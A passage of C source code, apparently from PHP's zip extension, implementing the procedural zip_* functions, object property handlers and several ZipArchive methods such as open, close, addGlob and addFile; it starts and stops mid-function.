#ifdef PHP_WIN32
if (IS_SLASH(*path)) {
cwd[2] = '\0';
}
#endif
cwd_skip = strlen(cwd)+1;
snprintf(work_path, MAXPATHLEN, "%s%c%s", cwd, DEFAULT_SLASH, path);
path = work_path;
}
#endif
if (ZIP_OPENBASEDIR_CHECKPATH(path)) {
return -1;
}
files_cnt = php_stream_scandir(path, &namelist, NULL, (void *) php_stream_dirent_alphasort);
if (files_cnt > 0) {
pcre *re = NULL;
pcre_extra *pcre_extra = NULL;
int preg_options = 0, i;
re = pcre_get_compiled_regex(regexp, &pcre_extra, &preg_options);
if (!re) {
php_error_docref(NULL, E_WARNING, "Invalid expression");
return -1;
}
array_init(return_value);
/* only the files, directories are ignored */
for (i = 0; i < files_cnt; i++) {
zend_stat_t s;
char fullpath[MAXPATHLEN];
int ovector[3];
int matches;
int namelist_len = ZSTR_LEN(namelist[i]);
if ((namelist_len == 1 && ZSTR_VAL(namelist[i])[0] == '.') ||
(namelist_len == 2 && ZSTR_VAL(namelist[i])[0] == '.' && ZSTR_VAL(namelist[i])[1] == '.')) {
zend_string_release(namelist[i]);
continue;
}
if ((path_len + namelist_len + 1) >= MAXPATHLEN) {
php_error_docref(NULL, E_WARNING, "add_path string too long (max: %i, %i given)",
MAXPATHLEN - 1, (path_len + namelist_len + 1));
zend_string_release(namelist[i]);
break;
}
snprintf(fullpath, MAXPATHLEN, "%s%c%s", path, DEFAULT_SLASH, ZSTR_VAL(namelist[i]));
if (0 != VCWD_STAT(fullpath, &s)) {
php_error_docref(NULL, E_WARNING, "Cannot read <%s>", fullpath);
zend_string_release(namelist[i]);
continue;
}
if (S_IFDIR == (s.st_mode & S_IFMT)) {
zend_string_release(namelist[i]);
continue;
}
matches = pcre_exec(re, NULL, ZSTR_VAL(namelist[i]), ZSTR_LEN(namelist[i]), 0, 0, ovector, 3);
/* 0 means that the vector is too small to hold all the captured substring offsets */
if (matches < 0) {
zend_string_release(namelist[i]);
continue;
}
add_next_index_string(return_value, fullpath);
zend_string_release(namelist[i]);
}
efree(namelist);
}
return files_cnt;
}
/* }}} */
/* {{{ arginfo */
ZEND_BEGIN_ARG_INFO_EX(arginfo_zip_open, 0, 0, 1)
ZEND_ARG_INFO(0, filename)
ZEND_END_ARG_INFO()
ZEND_BEGIN_ARG_INFO_EX(arginfo_zip_close, 0, 0, 1)
ZEND_ARG_INFO(0, zip)
ZEND_END_ARG_INFO()
ZEND_BEGIN_ARG_INFO_EX(arginfo_zip_read, 0, 0, 1)
ZEND_ARG_INFO(0, zip)
ZEND_END_ARG_INFO()
ZEND_BEGIN_ARG_INFO_EX(arginfo_zip_entry_open, 0, 0, 2)
ZEND_ARG_INFO(0, zip_dp)
ZEND_ARG_INFO(0, zip_entry)
ZEND_ARG_INFO(0, mode)
ZEND_END_ARG_INFO()
ZEND_BEGIN_ARG_INFO_EX(arginfo_zip_entry_close, 0, 0, 1)
ZEND_ARG_INFO(0, zip_ent)
ZEND_END_ARG_INFO()
ZEND_BEGIN_ARG_INFO_EX(arginfo_zip_entry_read, 0, 0, 1)
ZEND_ARG_INFO(0, zip_entry)
ZEND_ARG_INFO(0, len)
ZEND_END_ARG_INFO()
ZEND_BEGIN_ARG_INFO_EX(arginfo_zip_entry_name, 0, 0, 1)
ZEND_ARG_INFO(0, zip_entry)
ZEND_END_ARG_INFO()
ZEND_BEGIN_ARG_INFO_EX(arginfo_zip_entry_compressedsize, 0, 0, 1)
ZEND_ARG_INFO(0, zip_entry)
ZEND_END_ARG_INFO()
ZEND_BEGIN_ARG_INFO_EX(arginfo_zip_entry_filesize, 0, 0, 1)
ZEND_ARG_INFO(0, zip_entry)
ZEND_END_ARG_INFO()
ZEND_BEGIN_ARG_INFO_EX(arginfo_zip_entry_compressionmethod, 0, 0, 1)
ZEND_ARG_INFO(0, zip_entry)
ZEND_END_ARG_INFO()
/* }}} */
/* {{{ zend_function_entry */
static const zend_function_entry zip_functions[] = {
ZEND_RAW_FENTRY("zip_open", zif_zip_open, arginfo_zip_open, 0)
ZEND_RAW_FENTRY("zip_close", zif_zip_close, arginfo_zip_close, 0)
ZEND_RAW_FENTRY("zip_read", zif_zip_read, arginfo_zip_read, 0)
PHP_FE(zip_entry_open, arginfo_zip_entry_open)
PHP_FE(zip_entry_close, arginfo_zip_entry_close)
PHP_FE(zip_entry_read, arginfo_zip_entry_read)
PHP_FE(zip_entry_filesize, arginfo_zip_entry_filesize)
PHP_FE(zip_entry_name, arginfo_zip_entry_name)
PHP_FE(zip_entry_compressedsize, arginfo_zip_entry_compressedsize)
PHP_FE(zip_entry_compressionmethod, arginfo_zip_entry_compressionmethod)
#ifdef PHP_FE_END
PHP_FE_END
#else
{NULL,NULL,NULL}
#endif
};
/* }}} */
/* {{{ ZE2 OO definitions */
static zend_class_entry *zip_class_entry;
static zend_object_handlers zip_object_handlers;
static HashTable zip_prop_handlers;
typedef int (*zip_read_int_t)(struct zip *za);
typedef char *(*zip_read_const_char_t)(struct zip *za, int *len);
typedef char *(*zip_read_const_char_from_ze_t)(ze_zip_object *obj);
typedef struct _zip_prop_handler {
zip_read_int_t read_int_func;
zip_read_const_char_t read_const_char_func;
zip_read_const_char_from_ze_t read_const_char_from_obj_func;
int type;
} zip_prop_handler;
/* }}} */
static void php_zip_register_prop_handler(HashTable *prop_handler, char *name, zip_read_int_t read_int_func, zip_read_const_char_t read_char_func, zip_read_const_char_from_ze_t read_char_from_obj_func, int rettype) /* {{{ */
{
zip_prop_handler hnd;
hnd.read_const_char_func = read_char_func;
hnd.read_int_func = read_int_func;
hnd.read_const_char_from_obj_func = read_char_from_obj_func;
hnd.type = rettype;
zend_hash_str_add_mem(prop_handler, name, strlen(name), &hnd, sizeof(zip_prop_handler));
}
/* }}} */
static zval *php_zip_property_reader(ze_zip_object *obj, zip_prop_handler *hnd, zval *rv) /* {{{ */
{
const char *retchar = NULL;
int retint = 0;
int len = 0;
if (obj && obj->za != NULL) {
if (hnd->read_const_char_func) {
retchar = hnd->read_const_char_func(obj->za, &len);
} else {
if (hnd->read_int_func) {
retint = hnd->read_int_func(obj->za);
if (retint == -1) {
php_error_docref(NULL, E_WARNING, "Internal zip error returned");
return NULL;
}
} else {
if (hnd->read_const_char_from_obj_func) {
retchar = hnd->read_const_char_from_obj_func(obj);
len = strlen(retchar);
}
}
}
}
switch (hnd->type) {
case IS_STRING:
if (retchar) {
ZVAL_STRINGL(rv, (char *) retchar, len);
} else {
ZVAL_EMPTY_STRING(rv);
}
break;
/* case IS_TRUE */
case IS_FALSE:
ZVAL_BOOL(rv, (long)retint);
break;
case IS_LONG:
ZVAL_LONG(rv, (long)retint);
break;
default:
ZVAL_NULL(rv);
}
return rv;
}
/* }}} */
static zval *php_zip_get_property_ptr_ptr(zval *object, zval *member, int type, void **cache_slot) /* {{{ */
{
ze_zip_object *obj;
zval tmp_member;
zval *retval = NULL;
zip_prop_handler *hnd = NULL;
zend_object_handlers *std_hnd;
if (Z_TYPE_P(member) != IS_STRING) {
ZVAL_COPY(&tmp_member, member);
convert_to_string(&tmp_member);
member = &tmp_member;
cache_slot = NULL;
}
obj = Z_ZIP_P(object);
if (obj->prop_handler != NULL) {
hnd = zend_hash_find_ptr(obj->prop_handler, Z_STR_P(member));
}
if (hnd == NULL) {
std_hnd = zend_get_std_object_handlers();
retval = std_hnd->get_property_ptr_ptr(object, member, type, cache_slot);
}
if (member == &tmp_member) {
zval_dtor(member);
}
return retval;
}
/* }}} */
static zval *php_zip_read_property(zval *object, zval *member, int type, void **cache_slot, zval *rv) /* {{{ */
{
ze_zip_object *obj;
zval tmp_member;
zval *retval = NULL;
zip_prop_handler *hnd = NULL;
zend_object_handlers *std_hnd;
if (Z_TYPE_P(member) != IS_STRING) {
ZVAL_COPY(&tmp_member, member);
convert_to_string(&tmp_member);
member = &tmp_member;
cache_slot = NULL;
}
obj = Z_ZIP_P(object);
if (obj->prop_handler != NULL) {
hnd = zend_hash_find_ptr(obj->prop_handler, Z_STR_P(member));
}
if (hnd != NULL) {
retval = php_zip_property_reader(obj, hnd, rv);
if (retval == NULL) {
retval = &EG(uninitialized_zval);
}
} else {
std_hnd = zend_get_std_object_handlers();
retval = std_hnd->read_property(object, member, type, cache_slot, rv);
}
if (member == &tmp_member) {
zval_dtor(member);
}
return retval;
}
/* }}} */
static int php_zip_has_property(zval *object, zval *member, int type, void **cache_slot) /* {{{ */
{
ze_zip_object *obj;
zval tmp_member;
zip_prop_handler *hnd = NULL;
zend_object_handlers *std_hnd;
int retval = 0;
if (Z_TYPE_P(member) != IS_STRING) {
ZVAL_COPY(&tmp_member, member);
convert_to_string(&tmp_member);
member = &tmp_member;
cache_slot = NULL;
}
obj = Z_ZIP_P(object);
if (obj->prop_handler != NULL) {
hnd = zend_hash_find_ptr(obj->prop_handler, Z_STR_P(member));
}
if (hnd != NULL) {
zval tmp, *prop;
if (type == 2) {
retval = 1;
} else if ((prop = php_zip_property_reader(obj, hnd, &tmp)) != NULL) {
if (type == 1) {
retval = zend_is_true(&tmp);
} else if (type == 0) {
retval = (Z_TYPE(tmp) != IS_NULL);
}
}
zval_ptr_dtor(&tmp);
} else {
std_hnd = zend_get_std_object_handlers();
retval = std_hnd->has_property(object, member, type, cache_slot);
}
if (member == &tmp_member) {
zval_dtor(member);
}
return retval;
}
/* }}} */
static HashTable *php_zip_get_properties(zval *object)/* {{{ */
{
ze_zip_object *obj;
HashTable *props;
zip_prop_handler *hnd;
zend_string *key;
obj = Z_ZIP_P(object);
props = zend_std_get_properties(object);
if (obj->prop_handler == NULL) {
return NULL;
}
ZEND_HASH_FOREACH_STR_KEY_PTR(obj->prop_handler, key, hnd) {
zval *ret, val;
ret = php_zip_property_reader(obj, hnd, &val);
if (ret == NULL) {
ret = &EG(uninitialized_zval);
}
zend_hash_update(props, key, ret);
} ZEND_HASH_FOREACH_END();
return props;
}
/* }}} */
static void php_zip_object_free_storage(zend_object *object) /* {{{ */
{
ze_zip_object * intern = php_zip_fetch_object(object);
int i;
if (!intern) {
return;
}
if (intern->za) {
if (zip_close(intern->za) != 0) {
php_error_docref(NULL, E_WARNING, "Cannot destroy the zip context: %s", zip_strerror(intern->za));
return;
}
intern->za = NULL;
}
if (intern->buffers_cnt>0) {
for (i=0; i<intern->buffers_cnt; i++) {
efree(intern->buffers[i]);
}
efree(intern->buffers);
}
intern->za = NULL;
zend_object_std_dtor(&intern->zo);
if (intern->filename) {
efree(intern->filename);
}
}
/* }}} */
static zend_object *php_zip_object_new(zend_class_entry *class_type) /* {{{ */
{
ze_zip_object *intern;
intern = ecalloc(1, sizeof(ze_zip_object) + zend_object_properties_size(class_type));
intern->prop_handler = &zip_prop_handlers;
zend_object_std_init(&intern->zo, class_type);
object_properties_init(&intern->zo, class_type);
intern->zo.handlers = &zip_object_handlers;
return &intern->zo;
}
/* }}} */
/* {{{ Resource dtors */
/* {{{ php_zip_free_dir */
static void php_zip_free_dir(zend_resource *rsrc)
{
zip_rsrc * zip_int = (zip_rsrc *) rsrc->ptr;
if (zip_int) {
if (zip_int->za) {
if (zip_close(zip_int->za) != 0) {
php_error_docref(NULL, E_WARNING, "Cannot destroy the zip context");
}
zip_int->za = NULL;
}
efree(rsrc->ptr);
rsrc->ptr = NULL;
}
}
/* }}} */
/* {{{ php_zip_free_entry */
static void php_zip_free_entry(zend_resource *rsrc)
{
zip_read_rsrc *zr_rsrc = (zip_read_rsrc *) rsrc->ptr;
if (zr_rsrc) {
if (zr_rsrc->zf) {
zip_fclose(zr_rsrc->zf);
zr_rsrc->zf = NULL;
}
efree(zr_rsrc);
rsrc->ptr = NULL;
}
}
/* }}} */
/* }}}*/
/* reset macro */
/* {{{ function prototypes */
static PHP_MINIT_FUNCTION(zip);
static PHP_MSHUTDOWN_FUNCTION(zip);
static PHP_MINFO_FUNCTION(zip);
/* }}} */
/* {{{ zip_module_entry
*/
zend_module_entry zip_module_entry = {
STANDARD_MODULE_HEADER,
"zip",
zip_functions,
PHP_MINIT(zip),
PHP_MSHUTDOWN(zip),
NULL,
NULL,
PHP_MINFO(zip),
PHP_ZIP_VERSION,
STANDARD_MODULE_PROPERTIES
};
/* }}} */
#ifdef COMPILE_DL_ZIP
ZEND_GET_MODULE(zip)
#endif
/* set macro */
/* {{{ proto resource zip_open(string filename)
Create new zip using source uri for output */
static PHP_NAMED_FUNCTION(zif_zip_open)
{
char resolved_path[MAXPATHLEN + 1];
zip_rsrc *rsrc_int;
int err = 0;
zend_string *filename;
if (zend_parse_parameters(ZEND_NUM_ARGS(), "P", &filename) == FAILURE) {
return;
}
if (ZSTR_LEN(filename) == 0) {
php_error_docref(NULL, E_WARNING, "Empty string as source");
RETURN_FALSE;
}
if (ZIP_OPENBASEDIR_CHECKPATH(ZSTR_VAL(filename))) {
RETURN_FALSE;
}
if(!expand_filepath(ZSTR_VAL(filename), resolved_path)) {
RETURN_FALSE;
}
rsrc_int = (zip_rsrc *)emalloc(sizeof(zip_rsrc));
rsrc_int->za = zip_open(resolved_path, 0, &err);
if (rsrc_int->za == NULL) {
efree(rsrc_int);
RETURN_LONG((zend_long)err);
}
rsrc_int->index_current = 0;
rsrc_int->num_files = zip_get_num_files(rsrc_int->za);
RETURN_RES(zend_register_resource(rsrc_int, le_zip_dir));
}
/* }}} */
/* {{{ proto void zip_close(resource zip)
Close a Zip archive */
static PHP_NAMED_FUNCTION(zif_zip_close)
{
zval * zip;
zip_rsrc *z_rsrc = NULL;
if (zend_parse_parameters(ZEND_NUM_ARGS(), "r", &zip) == FAILURE) {
return;
}
if ((z_rsrc = (zip_rsrc *)zend_fetch_resource(Z_RES_P(zip), le_zip_dir_name, le_zip_dir)) == NULL) {
RETURN_FALSE;
}
/* really close the zip will break BC :-D */
zend_list_close(Z_RES_P(zip));
}
/* }}} */
/* {{{ proto resource zip_read(resource zip)
Returns the next file in the archive */
static PHP_NAMED_FUNCTION(zif_zip_read)
{
zval *zip_dp;
zip_read_rsrc *zr_rsrc;
int ret;
zip_rsrc *rsrc_int;
if (zend_parse_parameters(ZEND_NUM_ARGS(), "r", &zip_dp) == FAILURE) {
return;
}
if ((rsrc_int = (zip_rsrc *)zend_fetch_resource(Z_RES_P(zip_dp), le_zip_dir_name, le_zip_dir)) == NULL) {
RETURN_FALSE;
}
if (rsrc_int && rsrc_int->za) {
if (rsrc_int->index_current >= rsrc_int->num_files) {
RETURN_FALSE;
}
zr_rsrc = emalloc(sizeof(zip_read_rsrc));
ret = zip_stat_index(rsrc_int->za, rsrc_int->index_current, 0, &zr_rsrc->sb);
if (ret != 0) {
efree(zr_rsrc);
RETURN_FALSE;
}
zr_rsrc->zf = zip_fopen_index(rsrc_int->za, rsrc_int->index_current, 0);
if (zr_rsrc->zf) {
rsrc_int->index_current++;
RETURN_RES(zend_register_resource(zr_rsrc, le_zip_entry));
} else {
efree(zr_rsrc);
RETURN_FALSE;
}
} else {
RETURN_FALSE;
}
}
/* }}} */
/* {{{ proto bool zip_entry_open(resource zip_dp, resource zip_entry [, string mode])
Open a Zip File, pointed by the resource entry */
/* Dummy function to follow the old API */
static PHP_NAMED_FUNCTION(zif_zip_entry_open)
{
zval * zip;
zval * zip_entry;
char *mode = NULL;
size_t mode_len = 0;
zip_read_rsrc * zr_rsrc;
zip_rsrc *z_rsrc;
if (zend_parse_parameters(ZEND_NUM_ARGS(), "rr|s", &zip, &zip_entry, &mode, &mode_len) == FAILURE) {
return;
}
if ((zr_rsrc = (zip_read_rsrc *)zend_fetch_resource(Z_RES_P(zip_entry), le_zip_entry_name, le_zip_entry)) == NULL) {
RETURN_FALSE;
}
if ((z_rsrc = (zip_rsrc *)zend_fetch_resource(Z_RES_P(zip), le_zip_dir_name, le_zip_dir)) == NULL) {
RETURN_FALSE;
}
if (zr_rsrc->zf != NULL) {
RETURN_TRUE;
} else {
RETURN_FALSE;
}
}
/* }}} */
/* {{{ proto bool zip_entry_close(resource zip_ent)
Close a zip entry */
static PHP_NAMED_FUNCTION(zif_zip_entry_close)
{
zval * zip_entry;
zip_read_rsrc * zr_rsrc;
if (zend_parse_parameters(ZEND_NUM_ARGS(), "r", &zip_entry) == FAILURE) {
return;
}
if ((zr_rsrc = (zip_read_rsrc *)zend_fetch_resource(Z_RES_P(zip_entry), le_zip_entry_name, le_zip_entry)) == NULL) {
RETURN_FALSE;
}
RETURN_BOOL(SUCCESS == zend_list_close(Z_RES_P(zip_entry)));
}
/* }}} */
/* {{{ proto mixed zip_entry_read(resource zip_entry [, int len])
Read from an open directory entry */
static PHP_NAMED_FUNCTION(zif_zip_entry_read)
{
zval * zip_entry;
zend_long len = 0;
zip_read_rsrc * zr_rsrc;
zend_string *buffer;
int n = 0;
if (zend_parse_parameters(ZEND_NUM_ARGS(), "r|l", &zip_entry, &len) == FAILURE) {
return;
}
if ((zr_rsrc = (zip_read_rsrc *)zend_fetch_resource(Z_RES_P(zip_entry), le_zip_entry_name, le_zip_entry)) == NULL) {
RETURN_FALSE;
}
if (len <= 0) {
len = 1024;
}
if (zr_rsrc->zf) {
buffer = zend_string_safe_alloc(1, len, 0, 0);
n = zip_fread(zr_rsrc->zf, ZSTR_VAL(buffer), ZSTR_LEN(buffer));
if (n > 0) {
ZSTR_VAL(buffer)[n] = '\0';
ZSTR_LEN(buffer) = n;
RETURN_NEW_STR(buffer);
} else {
zend_string_free(buffer);
RETURN_EMPTY_STRING()
}
} else {
RETURN_FALSE;
}
}
/* }}} */
static void php_zip_entry_get_info(INTERNAL_FUNCTION_PARAMETERS, int opt) /* {{{ */
{
zval * zip_entry;
zip_read_rsrc * zr_rsrc;
if (zend_parse_parameters(ZEND_NUM_ARGS(), "r", &zip_entry) == FAILURE) {
return;
}
if ((zr_rsrc = (zip_read_rsrc *)zend_fetch_resource(Z_RES_P(zip_entry), le_zip_entry_name, le_zip_entry)) == NULL) {
RETURN_FALSE;
}
if (!zr_rsrc->zf) {
RETURN_FALSE;
}
switch (opt) {
case 0:
RETURN_STRING((char *)zr_rsrc->sb.name);
break;
case 1:
RETURN_LONG((zend_long) (zr_rsrc->sb.comp_size));
break;
case 2:
RETURN_LONG((zend_long) (zr_rsrc->sb.size));
break;
case 3:
switch (zr_rsrc->sb.comp_method) {
case 0:
RETURN_STRING("stored");
break;
case 1:
RETURN_STRING("shrunk");
break;
case 2:
case 3:
case 4:
case 5:
RETURN_STRING("reduced");
break;
case 6:
RETURN_STRING("imploded");
break;
case 7:
RETURN_STRING("tokenized");
break;
case 8:
RETURN_STRING("deflated");
break;
case 9:
RETURN_STRING("deflatedX");
break;
case 10:
RETURN_STRING("implodedX");
break;
default:
RETURN_FALSE;
}
RETURN_LONG((zend_long) (zr_rsrc->sb.comp_method));
break;
}
}
/* }}} */
/* {{{ proto string zip_entry_name(resource zip_entry)
Return the name given a ZZip entry */
static PHP_NAMED_FUNCTION(zif_zip_entry_name)
{
php_zip_entry_get_info(INTERNAL_FUNCTION_PARAM_PASSTHRU, 0);
}
/* }}} */
/* {{{ proto int zip_entry_compressedsize(resource zip_entry)
Return the compressed size of a ZZip entry */
static PHP_NAMED_FUNCTION(zif_zip_entry_compressedsize)
{
php_zip_entry_get_info(INTERNAL_FUNCTION_PARAM_PASSTHRU, 1);
}
/* }}} */
/* {{{ proto int zip_entry_filesize(resource zip_entry)
Return the actual filesize of a ZZip entry */
static PHP_NAMED_FUNCTION(zif_zip_entry_filesize)
{
php_zip_entry_get_info(INTERNAL_FUNCTION_PARAM_PASSTHRU, 2);
}
/* }}} */
/* {{{ proto string zip_entry_compressionmethod(resource zip_entry)
Return a string containing the compression method used on a particular entry */
static PHP_NAMED_FUNCTION(zif_zip_entry_compressionmethod)
{
php_zip_entry_get_info(INTERNAL_FUNCTION_PARAM_PASSTHRU, 3);
}
/* }}} */
/* {{{ proto mixed ZipArchive::open(string source [, int flags])
Create new zip using source uri for output, return TRUE on success or the error code */
static ZIPARCHIVE_METHOD(open)
{
struct zip *intern;
int err = 0;
zend_long flags = 0;
char *resolved_path;
zend_string *filename;
zval *self = getThis();
ze_zip_object *ze_obj = NULL;
if (zend_parse_parameters(ZEND_NUM_ARGS(), "P|l", &filename, &flags) == FAILURE) {
return;
}
if (self) {
/* We do not use ZIP_FROM_OBJECT, zip init function here */
ze_obj = Z_ZIP_P(self);
}
if (ZSTR_LEN(filename) == 0) {
php_error_docref(NULL, E_WARNING, "Empty string as source");
RETURN_FALSE;
}
if (ZIP_OPENBASEDIR_CHECKPATH(ZSTR_VAL(filename))) {
RETURN_FALSE;
}
if (!(resolved_path = expand_filepath(ZSTR_VAL(filename), NULL))) {
RETURN_FALSE;
}
if (ze_obj->za) {
/* we already have an opened zip, free it */
if (zip_close(ze_obj->za) != 0) {
php_error_docref(NULL, E_WARNING, "Empty string as source");
efree(resolved_path);
RETURN_FALSE;
}
ze_obj->za = NULL;
}
if (ze_obj->filename) {
efree(ze_obj->filename);
ze_obj->filename = NULL;
}
intern = zip_open(resolved_path, flags, &err);
if (!intern || err) {
efree(resolved_path);
RETURN_LONG((zend_long)err);
}
ze_obj->filename = resolved_path;
ze_obj->filename_len = strlen(resolved_path);
ze_obj->za = intern;
RETURN_TRUE;
}
/* }}} */
/* {{{ proto resource ZipArchive::setPassword(string password)
Set the password for the active archive */
static ZIPARCHIVE_METHOD(setPassword)
{
struct zip *intern;
zval *self = getThis();
char *password;
size_t password_len;
if (!self) {
RETURN_FALSE;
}
ZIP_FROM_OBJECT(intern, self);
if (zend_parse_parameters(ZEND_NUM_ARGS(), "s", &password, &password_len) == FAILURE) {
return;
}
if (password_len < 1) {
RETURN_FALSE;
} else {
int res = zip_set_default_password(intern, (const char *)password);
if (res == 0) {
RETURN_TRUE;
} else {
RETURN_FALSE;
}
}
}
/* }}} */
/* {{{ proto bool ZipArchive::close()
close the zip archive */
static ZIPARCHIVE_METHOD(close)
{
struct zip *intern;
zval *self = getThis();
ze_zip_object *ze_obj;
int err;
if (!self) {
RETURN_FALSE;
}
ZIP_FROM_OBJECT(intern, self);
ze_obj = Z_ZIP_P(self);
if ((err = zip_close(intern))) {
php_error_docref(NULL, E_WARNING, "%s", zip_strerror(intern));
zip_discard(intern);
}
efree(ze_obj->filename);
ze_obj->filename = NULL;
ze_obj->filename_len = 0;
ze_obj->za = NULL;
if (!err) {
RETURN_TRUE;
} else {
RETURN_FALSE;
}
}
/* }}} */
/* {{{ proto string ZipArchive::getStatusString()
* Returns the status error message, system and/or zip messages */
static ZIPARCHIVE_METHOD(getStatusString)
{
struct zip *intern;
zval *self = getThis();
#if LIBZIP_VERSION_MAJOR < 1
int zep, syp, len;
char error_string[128];
#else
zip_error_t *err;
#endif
if (!self) {
RETURN_FALSE;
}
ZIP_FROM_OBJECT(intern, self);
#if LIBZIP_VERSION_MAJOR < 1
zip_error_get(intern, &zep, &syp);
len = zip_error_to_str(error_string, 128, zep, syp);
RETVAL_STRINGL(error_string, len);
#else
err = zip_get_error(intern);
RETVAL_STRING(zip_error_strerror(err));
zip_error_fini(err);
#endif
}
/* }}} */
/* {{{ proto bool ZipArchive::createEmptyDir(string dirname)
Returns the index of the entry named filename in the archive */
static ZIPARCHIVE_METHOD(addEmptyDir)
{
struct zip *intern;
zval *self = getThis();
char *dirname;
size_t dirname_len;
int idx;
struct zip_stat sb;
char *s;
if (!self) {
RETURN_FALSE;
}
ZIP_FROM_OBJECT(intern, self);
if (zend_parse_parameters(ZEND_NUM_ARGS(), "s",
&dirname, &dirname_len) == FAILURE) {
return;
}
if (dirname_len<1) {
RETURN_FALSE;
}
if (dirname[dirname_len-1] != '/') {
s=(char *)emalloc(dirname_len+2);
strcpy(s, dirname);
s[dirname_len] = '/';
s[dirname_len+1] = '\0';
} else {
s = dirname;
}
idx = zip_stat(intern, s, 0, &sb);
if (idx >= 0) {
RETVAL_FALSE;
} else {
if (zip_add_dir(intern, (const char *)s) == -1) {
RETVAL_FALSE;
}
zip_error_clear(intern);
RETVAL_TRUE;
}
if (s != dirname) {
efree(s);
}
}
/* }}} */
static void php_zip_add_from_pattern(INTERNAL_FUNCTION_PARAMETERS, int type) /* {{{ */
{
struct zip *intern;
zval *self = getThis();
char *path = NULL;
char *remove_path = NULL;
char *add_path = NULL;
size_t add_path_len, remove_path_len = 0, path_len = 0;
zend_long remove_all_path = 0;
zend_long flags = 0;
zval *options = NULL;
int found;
zend_string *pattern;
if (!self) {
RETURN_FALSE;
}
ZIP_FROM_OBJECT(intern, self);
/* 1 == glob, 2 == pcre */
if (type == 1) {
if (zend_parse_parameters(ZEND_NUM_ARGS(), "P|la",
&pattern, &flags, &options) == FAILURE) {
return;
}
} else {
if (zend_parse_parameters(ZEND_NUM_ARGS(), "P|sa",
&pattern, &path, &path_len, &options) == FAILURE) {
return;
}
}
if (ZSTR_LEN(pattern) == 0) {
php_error_docref(NULL, E_NOTICE, "Empty string as pattern");
RETURN_FALSE;
}
if (options && (php_zip_parse_options(options, &remove_all_path, &remove_path, &remove_path_len,
&add_path, &add_path_len) < 0)) {
RETURN_FALSE;
}
if (remove_path && remove_path_len > 1) {
size_t real_len = strlen(remove_path);
if ((real_len > 1) && ((remove_path[real_len - 1] == '/') || (remove_path[real_len - 1] == '\\'))) {
remove_path[real_len - 1] = '\0';
}
}
if (type == 1) {
found = php_zip_glob(ZSTR_VAL(pattern), ZSTR_LEN(pattern), flags, return_value);
} else {
found = php_zip_pcre(pattern, path, path_len, return_value);
}
if (found > 0) {
int i;
zval *zval_file;
for (i = 0; i < found; i++) {
char *file_stripped, *entry_name;
size_t entry_name_len, file_stripped_len;
char entry_name_buf[MAXPATHLEN];
zend_string *basename = NULL;
if ((zval_file = zend_hash_index_find(Z_ARRVAL_P(return_value), i)) != NULL) {
if (remove_all_path) {
basename = php_basename(Z_STRVAL_P(zval_file), Z_STRLEN_P(zval_file), NULL, 0);
file_stripped = ZSTR_VAL(basename);
file_stripped_len = ZSTR_LEN(basename);
} else if (remove_path && strstr(Z_STRVAL_P(zval_file), remove_path) != NULL) {
file_stripped = Z_STRVAL_P(zval_file) + remove_path_len + 1;
file_stripped_len = Z_STRLEN_P(zval_file) - remove_path_len - 1;
} else {
file_stripped = Z_STRVAL_P(zval_file);
file_stripped_len = Z_STRLEN_P(zval_file);
}
if (add_path) {
if ((add_path_len + file_stripped_len) > MAXPATHLEN) {
php_error_docref(NULL, E_WARNING, "Entry name too long (max: %d, %pd given)",
MAXPATHLEN - 1, (add_path_len + file_stripped_len));
zval_ptr_dtor(return_value);
RETURN_FALSE;
}
snprintf(entry_name_buf, MAXPATHLEN, "%s%s", add_path, file_stripped);
entry_name = entry_name_buf;
entry_name_len = strlen(entry_name);
} else {
entry_name = Z_STRVAL_P(zval_file);
entry_name_len = Z_STRLEN_P(zval_file);
}
if (basename) {
zend_string_release(basename);
basename = NULL;
}
if (php_zip_add_file(intern, Z_STRVAL_P(zval_file), Z_STRLEN_P(zval_file),
entry_name, entry_name_len, 0, 0) < 0) {
zval_dtor(return_value);
RETURN_FALSE;
}
}
}
}
}
/* }}} */
/* {{{ proto bool ZipArchive::addGlob(string pattern[,int flags [, array options]])
Add files matching the glob pattern. See php's glob for the pattern syntax. */
static ZIPARCHIVE_METHOD(addGlob)
{
php_zip_add_from_pattern(INTERNAL_FUNCTION_PARAM_PASSTHRU, 1);
}
/* }}} */
/* {{{ proto bool ZipArchive::addPattern(string pattern[, string path [, array options]])
Add files matching the pcre pattern. See php's pcre for the pattern syntax. */
static ZIPARCHIVE_METHOD(addPattern)
{
php_zip_add_from_pattern(INTERNAL_FUNCTION_PARAM_PASSTHRU, 2);
}
/* }}} */
/* {{{ proto bool ZipArchive::addFile(string filepath[, string entryname[, int start [, int length]]])
Add a file in a Zip archive using its path and the name to use. */
static ZIPARCHIVE_METHOD(addFile)
{
struct zip *intern;
zval *self = getThis();
char *entry_name = NULL;
size_t entry_name_len = 0;
zend_long offset_start = 0, offset_len = 0;
zend_string *filename;
if (!self) {
RETURN_FALSE;
}
ZIP_FROM_OBJECT(intern, self);
if (zend_parse_parameters(ZEND_NUM_ARGS(), "P|sll",
&filename, &entry_name, &entry_name_len, &offset_start, &offset_len) == FAILURE) {
return;
}
if (ZSTR_LEN(filename) == 0) {
php_error_docref(NULL, E_NOTICE, "Empty string as filename");
RETURN_FALSE;
}
if (entry_name_len == 0) {
entry_name = ZSTR_VAL(filename);
entry_name_len = ZSTR_LEN(filename);
}
if (php_zip_add_file(intern, ZSTR_VAL(filename), ZSTR_LEN(filename), entry_name, entry_name_len, 0, 0) < 0) {
RETURN_FALSE;
} else {
RETURN_TRUE;
}
}
/* }}} */
/* {{{ proto bool ZipArchive::addFromString(string name, string content)
Add a file using content and the entry name */
static ZIPARCHIVE_METHOD(addFromString)
{
struct zip *intern;
zval *self = getThis();
zend_string *buffer;
char *name;
size_t name_len;
ze_zip_object *ze_obj;
struct zip_source *zs;
int pos = 0;
int cur_idx;
if (!self) {
RETURN_FALSE;
}
ZIP_FROM_OBJECT(intern, self);
if (zend_parse_parameters(ZEND_NUM_ARGS(), "sS",
&name, &name_len, &buffer) == FAILURE) {
return;
}
ze_obj = Z_ZIP_P(self);
if (ze_obj->buffers_cnt) {
ze_obj->buffers = (char **)erealloc(ze_obj->buffers, sizeof(char *) * (ze_obj->buffers_cnt+1));
pos = ze_obj->buffers_cnt++;
} else {
ze_obj->buffers = (char **)emalloc(sizeof(char *));
ze_obj->buffers_cnt++;
pos = 0;
}
ze_obj->buffers[pos] = (char *)emalloc(ZSTR_LEN(buffer) + 1);
memcpy(ze_obj->buffers[pos], ZSTR_VAL(buffer), ZSTR_LEN(buffer) + 1);
zs = zip_source_buffer(intern, ze_obj->buffers[pos], ZSTR_LEN(buffer), 0);
if (zs == NULL) {
RETURN_FALSE;
}
